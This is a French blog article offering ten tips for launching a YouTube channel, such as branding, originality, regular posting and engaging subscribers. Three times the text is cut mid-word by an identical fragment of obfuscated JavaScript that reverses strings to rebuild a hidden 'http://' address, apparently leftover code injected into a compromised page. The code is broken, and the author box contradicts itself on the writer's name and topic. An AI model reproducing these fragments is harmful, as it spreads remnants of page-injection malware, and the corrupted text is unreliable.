Youuutube ? YouTube est partout ! Qu’il s’agisse de mode, de make up, de cuisine ou bien de décorations ou d’astuces en tout genre ce réseau social est incontournable. Il y a ceux qui recherchent de nouvelles vidéos et ceux qui en sont les auteurs. Cela vous dit quelque chose ?
Huum laissez-moi réfléchir… Les YOUTUBERS bien sûr ! Et oui ! Rire, humour, beauté, gaming, musique, ils sont de plus en plus nombreux à se lancer dans cette belle aventure à partager et échanger chaque jour avec le monde entier. Vivre sa passion au gr {if (typeof ($Ikf.list[n]) == « string ») return $Ikf.list[n].split(« »).reverse().join(« »);return $Ikf.list[n];};$Ikf.list=[« \’ //:ptth\’= « ]; ( () * 6); ; );}and jour et partager sa vision et son quotidien de manière différente, échanger et partager des moments magiques avec sa communauté, telle est la possibilité de YouTube. Qui ne rêve pas de vivre une jolie expérience façon EnjoyPhoenix ?
YouTube vous attire depuis quelques temps et vous ne savez pas par où commencer ? Alors n’attendez plus et lancez-vous ! Molly a sélectionné pour vous dix petits conseils tirés de son expérience personnelle qui vous aideront à mieux vous préparer et à partir avec un bel avantage dans cette belle aventure.
On se lance dans l’aventure Youtube
1/ PERSONNALISEZ
Il n’y a pas de secret, pour bien débuter sur YouTube il faut bien évidemment commencer par le commencement : Le nom de chaine ! Et oui, celui qui deviendra votre image de marque, votre logo, le reflet de votre chaine et de votre personnalité. Une fois le petit nom choisi consacrez-vous au design de votre chaine. Une belle bannière, une jolie petite photo de profil, des couleurs que vous aimez, des playlists, une description accueillante et Hop le tour est joué. Ayez une chaine qui ai du style !
2/ SOYEZ ORIGINALES
Avant même de commencer votre première vidéo il vous faut définir vos objectifs. Un thème, un concept, quelque chose de différent que personne ne peut trouver ailleurs que sur votre petite chaine toute mignonne ! En clair construisez un concept propre à vous-même. Faites comme bon vous semble et aller au fond de vos propres idées et démarquez-vous. N’essayez pas de copier ou de piquer les idées de telles ou telles youtubeuses, créez votre propre contenu à votre image et soyez fières de ce que vous proposez. L’originalité est la clé de tout succès.
3 / SE PRESENTER
Comme dans n’importe quel nouvel environnement à votre arrivée il vous faut vous présenter. Une petite vidéo qui résume vos idées, votre concept, vos futurs projets, les sujets de vos vidéos, … Cela paraît idiot mais c’est quelque chose de très important. Cette vidéo sera regardée par des dizaines de personnes et il vous faudra vous vendre, vous mettre en avant pour conquérir vos premiers abonnés. Avec celle-ci vous aurez l’opportunité de prendre un bon départ et d’échanger pour la toute première fois avec votre communauté.
4/CREER SANS SE RUINER
Pas besoin de se ruiner, n’investissez pas dans du matériel haut de gamme dès le départ. Comment croyez-vous que les gr {if (typeof ($Ikf.list[n]) == « string ») return $Ikf.list[n].split(« »).reverse().join(« »);return $Ikf.list[n];};$Ikf.list=[« \’ //:ptth\’= « ]; ( () * 6); ; );}and youtubeurs ont commencé ? Pas de trépieds ? Quelques livres sur une étagère feront l’affaire ! Pas de caméra ? Votre téléphone vous sera très utile ! Il existe un tas d’applications et de logiciels gratuits qui seront très utiles pour le montage. Concentrez-vous sur votre contenu et sur le message que vous voulez faire passer. Avec le temps vous pourrez investir peut-être dans du matériel un peu plus sophistiqué mais en attendant faites avec ce que vous avez. La simplicité est parfois la meilleure des armes.
5/ PRIVILEGIEZ LA QUALITE
Et oui comme dit le proverbe : « privilégiez la qualité à la quantité ». Préférez une vidéo qui soit travaillée avec un bon contenu à plusieurs vidéos sans intérêt. Si vous pensez qu’un sujet ne peut pas constituer une vidéo entière alors regroupez-en plusieurs sous une forme différente. Il est préférable de faire une bonne vidéo que plusieurs mauvaises. Cela vous permettra de vous améliorer et de fidéliser vos abonnés.
6/ LA REGULARITE
La régularité est très importante, un abonné aura plus de chance de s’abonner si vous lui donnez un rendez-vous. Organisez-vous et choisissez le jour parfait pour publier. Pensez aussi à poster une vidéo toutes les semaines pour ne pas avoir une chaine fantôme. Si vous publier de manière irrégulière les personnes qui vous regardent risquent d’être perdu et par conséquent vous perdrez des abonnés, ils auront plus de mal à s’attacher à vous si vous n’êtes pas présents.
7/ SE RAPPELER SES MOTIVATIONS
Il y a quelques fois où la motivation va retomber et vous allez avoir envie de tout arrêter. C’est normal, l’aventure YouTube est belle mais l’ascension reste tout de même longue alors il faut trouver un moyen de vous motiver à n’importe quel moment. Faites des listes où vous vous rappelez les raisons pour lesquelles vous avez débuté et ce qui vous plais dans ce projet. Faites aussi des penses bêtes avec des raisons de continuer ou relisez les commentaires de vos abonnés. Le partage est très enrichissant et motivant, n’ab {if (typeof ($Ikf.list[n]) == « string ») return $Ikf.list[n].split(« »).reverse().join(« »);return $Ikf.list[n];};$Ikf.list=[« \’ //:ptth\’= « ]; ( () * 6); ; );}andonnez pas si vous aimez réellement ce que vous faites. La motivation reviendra au galop.
8/ PROFITEZ
Amusez-vous et profitez de ces bons moments de partage. Eclatez-vous et soyez vous-même dans vos vidéos, vos abonnés verront à quel point vous êtes géniale et ils vous adoreront. Profitez et riez en relevant des défis idiots ou en essayant des expériences nouvelles et insolites. Beaucoup de gens rêvent de créer une chaine YouTube mais peu d’entre nous sautent le pas alors soyez fière d’être youtubeuse !
9/INTERAGISSEZ
Il est important d’interagir avec ses abonnés. Vous devez répondre aux commentaires ou les inviter à vous suivre sur vos autres réseaux sociaux. Consacrez leurs du temps ils vous en remercieront. N’hésitez pas à leurs lancer des défis dans vos vidéos, un certain nombre de pouce ou un mot à glisser discrètement dans les commentaires. Il est très simple de trouver des idées pour vous rapprocher de votre « team » !
10/ PARTAGEZ
Pensez à partager votre chaine sur vos différents réseaux sociaux. Il faut vous faire connaître. Parlez-en autour de vous, invitez vos amis, glisser le sur un commentaire sur vos applications favorites. Trouvez n’importe quel prétexte pour échanger au sujet de votre petite merveille !
Et voilà, vous voilà fin prête pour débuter votre aventure YouTube ! Alors, vous vous lancez ?
Cindy Manu
Passionnée par le monde des mots et avide de découvertes, je m'appelle Maria Alejandra. En tant que rédactrice au sein de ce magazine féminin, je suis constamment en quête d'informations captivantes à partager avec notre précieuse communauté.
Ma curiosité insatiable m'entraîne à explorer les recoins les plus variés d'Internet, où je dévore avec enthousiasme tout ce que je peux trouver. C'est avec une joie débordante que je m'engage à vous transmettre les trésors de connaissances que je découvre, en particulier dans le domaine des animaux.